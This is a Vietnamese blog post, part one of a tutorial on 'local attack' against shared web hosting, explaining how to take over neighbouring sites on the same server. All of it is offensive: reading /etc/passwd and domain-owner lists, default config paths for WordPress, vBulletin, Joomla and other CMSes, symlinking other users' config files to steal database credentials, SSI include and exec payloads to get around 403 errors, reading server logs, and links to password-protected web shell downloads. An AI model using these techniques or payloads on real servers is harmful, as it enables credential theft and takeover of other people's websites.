Thứ Hai, 30 tháng 9, 2013

Tổng Hợp Các Phương Pháp Local Attack Thường Dùng(phan 1)


* Nhắc lại trình tự các bước Local Attack

1- View danh sách các user trong server
2- Tìm file config.php
3- Get thông tin login vào database
4- Crack hoặc change pass admin
5- Login vào quyên quản trị và upshell

1- View danh sách các user trên server
Muốn local được 1 site nào đó trên server thì trướ tiên cần phải xác định site đó có user là gì, source code là gì từ đó tìm cách đọc file config.php của user đó
- Một số câu lệnh để get user:
Lệnh phổ biến nhất:

Cat /etc/passwd
Tuy nhiên một số server cấm lệnh cat, có thể sử dụng các lệnh sau một cách linh hoạt
Less /etc/passwd
./cat/etc/passwd
More /etc/passwd
Ngoài ra có thể sử dụng chức năng get user trên shell byg.php, c99.php hay bypass ở r57.php, soleil.pin, telnet.pl hoặc các shell sau:
http://www.mediafire.com/?gic70c6ce441333
http://www.mediafire.com/?hi4gnmu3kpxn095 ( đk: chmod 755)
http://www.mediafire.com/?2rk42hiv9b4ii3f
Pass download: soleil_vhb
Pass dải nén: ceh.vn
- Câu lênh get user & domain
Cat /etc/virtual/domainowners ( Chỉ dùng đối với direct admin )​

2- Tìm file path file config.php
Đối với các mã nguồn mở thì path file config được mặc định như sau:
Lưu ý: “path” chính là path từ server dẫn tới site, ví dụ đối với server linux, path là: /home/user/public_html

- Vbulletin:
path/includes/config.php
- Mybb:
path/inc/config.php
- Joomla:
path/configuration.php
- Word-Press:
path/wp-config.php
- Ibp:
path/conf_global.php
- Php-fusion:
path/config.php
- Smf:
Path/Settings.php
- Nuke:
path/config.php
- Xoops:
path/mainfile.php
- Zen Cart
Path/includes/configure.php
- path/setidio:
path/datas/config.php
- Datalife Engine:
path/engine/data/config.php
- Phpbb:
Path/config.php
- Wordpress:
path/wp-config.php
- Seditio:
path/datas/config.php
- Drupal:
path/sites/default/settings.php
- Discuz
path/config/config_ucenter.php
- Bo-Blog
path/data/config.php

- Đây là path mặc định đối với các mã nguồn mở, còn đối với site tự code thì thông thường path vẫn đặt hay ngay sau thư mục public_html ( path/config.php ).
- Đối với các quản trị viên chú ý đến tính năng bảo mật, phòng tránh local attack thì họ thường dấu kỹ và thay đổi path dẫn đến file config, trong trường hợp này cần phải dò path bắt đầu từ file index đi vào. Soleil sẽ lấy ví dụ dò path file config đối với vbulletin chẳng hạn:
Forum.php -> global.php -> includes/class_bootstrap -> includes/init.php -> includes/class_core.php -> includes/config.php
( Để tìm kiếm path trong source, search theo từ khóa: “cwd”, ta sẽ thấy đoạn code tương tự như: “require_once(CWD . '/includes/init.php');” - Đây là path mặc định dẫn tới file init.php))……
3- Get thông tin file config
Phần này chính là phần trọng tâm nhất trong bộ tut local attack. Trong phần này soleil sẽ giới thiệu đầy đủ các kỹ thuật cơ bản để local attack.
3.1- Trước hết ta cần tìm hiểu qua về các câu lệnh cơ bản trong linux ứng dụng cho local attck:
- Ls , dir : Liệt kê tên các file bên trong thư mục
ls -al, ls -lia: Liệt kê tên và thuộc tính các file bên trong thư mục
Ls -lia /home/vhbgroup/public_html/@4rum/includes.config.php
- Cat, ./cat, less, more, tail : View nôi dung bên trong các file:
Cat /home/vhbgroup/public_html/@4rum/includes/config.php
- Ln : Lệnh symbolic link:

Ln -s /home/vhbgroup/public_html/@4rum/includes/config.php soleil.ini

- Cd: Chuyển đổi thư mục
Ví dụ muốn chuyển tới thư mục soleil”
Cd /home/vhbgroup/public_html/@4rum/includes/soleil
cd ~ : Tới thư mục home dictionary
cd -: Quay lại thư mục vừa làm việc
cd ..: Tới thư mục kề bên ngoài thư mục đang làm việc​
- Chmod: Phân quyền cho các file hoặc thư mục:
Chmod 400 config.php ( đang làm việc trong thư mục includes chứa file config.php )​
- Mkdir: tạo thư mục:
Ví du muốn tạo thư mục soleil trong thư mục includes:
Mkdir /home/vhbgroup/public_html/@4rum/includes/soleil
- Touch : Tạo file:
touch /home/vhbgroup/public_html/@4rum/includes/soleil.php
- Tar, zip: Lệnh nén và giải nén: thường sử dụng trong symlink root
Tar –zcvf ducdung08clc.tar.gz soleil ( Nén thư mục soleil thành file ducdung08clc.tar.gz)
Tar –zxvf ducdung08clc.tar.gz ( giải nén file ducdung08clc.tar.gz)​
Zip –r -9 ducdung08clc.zip soleil ( Nén thư mục soleil thành file ducdung08clc.zip)
Zip -p ducdung08clc.zip ( Giải nén file ducdung.tar.gz)​
…………
3.2-Phần tiếp theo Soleil sẽ trình bày 1 số kỹ thuật dùng để lấy thông tin file config.php
1- Sử dụng các lệnh cat, dir để xem tên thư mục, tệp tin và đọc nội dung tệp tin.
Ví dụ:
dir /home/vhbgroup/public_html/includes
cat /home/vhbgroup/public_html/includes/config.php
Nhưng hiện nay phần lớn các server đều không cho phép thực thi những hàm này nên ứng dụng phương pháp này không mấy khả thi
2- Sử dụng Symbolic link – Gọi tắt là symlink
Symbolic link là kỹ thuật cơ bản và gần như là quan trọng mà phần lớn các attaker nghĩ đến đầu tiên trước khi thực hiện công việc local attack.
Ln -s /home/vhbgroup/public_html/@4rum/includes/config.php soleil.ini

Có thể hiểu đơn giản là tạo 1 file soleil.ini trên host có nội dung giống file config.php của user vhbgroup trên server có path /home/vhbgroup/public_html/@4rum/includes/config.php
Có thể thay soleil.ini bằng .txt nhưng do thói quen soleil vẫn hay sử dụng .ini hơn bởi vì đối với 1 số server bị lỗi nó có thể bypass permissions 400.
3- Sử dụng symlink kết hợp với ssi:
Đối với 1 sô server khi symbolick link bình thường xuất hiên 403 forbinden – không cho phép đọc file đã được symlink thì giải pháp được nghĩ đến đó là kết hợp với ssi.
- Tạo 1 file ducdung08clc.shtml với nội dung như sau:
<!--#include virtual="soleil.ini"-->
Trong đó file soleil.ini là file đã được symbolic link trên server.
Bây giờ view source của file ducdung08clc.shtml ta sẽ thấy đc nội dung file soleil.ini đã symbolic link.
4- Chạy lệnh bằng file .shtml
- Tuy nhiên có 1 số server cả 2 cách đó đều không áp dụng được nhưng nó lại cho chạy lệnh bằng file .shtml
<!--#exec cmd="cat /etc/passwd"-->​
- Lệnh xem file logs như sau:
<!--#exec cmd="tail -n 10000 /var/log/httpd/domains/vhbgroup.net.error.log"-->
Lưu ý: + lệnh tail cũng giống như lệnh cat nhưng nó dùng để xem nhưng dòng cuối cùng của file trên server.
+ /var/log/httpd/domains/vhbgroup.net.error.log là path dẫn đến file error.log của direct admin
+ Còn path dẫn đến file error.log của cpanel là: /usr/local/apache/logs/error_log ….., tùy vào bộ cài host mà path dẫn đến file error.log khác nhau.
5- Get all config toàn server
- Đâu tiên download shell get all config ( w.php) về rồi up lên server.
http://www.mediafire.com/?hi4gnmu3kpxn095 ( pass unlock: soleil_vhb )
[​IMG]
- Click vào done và thư mục có tên là tmp sẽ được tạo ra.
- Vào link của thư mục tmp sẽ có 1 số shell với các chức năng sau:
+ dz.sa : Đây là shell cgi, sử dụng nó để get các user trên server bằng cách thực thi câu lệnh: cat /etc/passwd, more /etc/passwd ( Pass login là: dz ).
+ user.sa : Shell này dung để xem danh sách các user và domain trên server.
+ config.sa : Shell này có nhiệm vụ thực thi get all config bằng phương pháp symlink

Không có nhận xét nào:

Đăng nhận xét